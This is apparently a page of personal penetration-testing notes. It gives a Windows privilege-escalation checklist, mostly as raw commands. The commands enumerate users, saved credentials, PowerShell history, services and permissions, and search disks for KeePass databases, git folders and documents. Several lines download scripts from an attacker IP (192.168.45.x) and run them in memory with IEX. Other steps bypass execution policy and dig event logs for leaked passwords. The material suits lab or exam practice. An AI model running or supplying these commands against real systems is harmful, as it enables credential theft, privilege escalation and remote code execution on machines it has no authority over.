LinkedInGitHub

Checklist

Adding a new user to the local Administrators group is the nosiest thing you can do. Instead always try to get the first stage of the payload executed

set PATH=%PATH%C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0;

Basic enum / quick wins

set username
set computername
whoami /all
cmdkey /list
systeminfo
net user
net user <current user>
net group
Get-History
(Get-PSReadlineOption).HistorySavePath
type <previous command output>
ls C:\Users\bob\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\

Do this for all available users; Post exploitation as well

Network and port enum

ipconfig /all
netstat -ano
route print

Installed software and service enum

dir C:\
dir "C:\Program Files"
dir "C:\Program Files (x86)"
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
services
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
cmd.exe /c cmd.exe /c 'wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """''wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """'
icacls <service binary path>
sc.exe sdshow <Service>

Search for the same set of permissions for WD (everyone)

Sensitive file enum

$env:AppKey
gci -Path C:\ -Include *.kdbx,.git -File -Recurse -ErrorAction SilentlyContinue
gci -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
gci -Path C:\Users\ -Include *.exe,*.txt,*.rdp,*.pdf,*.xls,*.xlsx,*.xml,*.doc,*.docx,*.ps1,*.bat -File -Recurse -ErrorAction SilentlyContinue
gci -h -Path C:\Users\ -Include *.exe,*.txt,*.rdp,*.pdf,*.xls,*.xlsx,*.xml,*.doc,*.docx,*.ps1,*.bat -File -Recurse -ErrorAction SilentlyContinue
gci C:\Users\Public
where.exe /R C:\Windows bash.exe
where.exe /R C:\Windows wsl.exe

Process snooping

Import-Module .\Watch-Command.ps1
Get-Process | watch-command -diff -cont -verbose -property "Image Name"

  1. Winpeas

curl 192.168.45.x/winPEASx64.exe -o winpeas.exe
.\winpeas.exe

  1. PowerUp

IEX(New-Object Net.WebClient).downloadString('http://192.168.45.x/PowerUp.ps1');Invoke-Allchecks

  1. Privesc

IEX(New-Object Net.WebClient).downloadString('http://192.168.45.x/Privesc.ps1');Invoke-PrivEsc

  1. PrivescCheck

powershell.exe -ep bypass -NoP -c '. .\PrivescCheck.ps1; Invoke-PrivescCheck'

Last case, dig through event log for events recorded by Script Block Logging. Maybe there will be a password lol.

  1. eventvwr

  2. Applicatioins and Services

  3. Microsoft

  4. Windows

  5. Powershell

  6. Operational

  7. Filter current log

  8. Event 4104

PreviousPayload DeliveryNextInitial Enumeration Manual

Last updated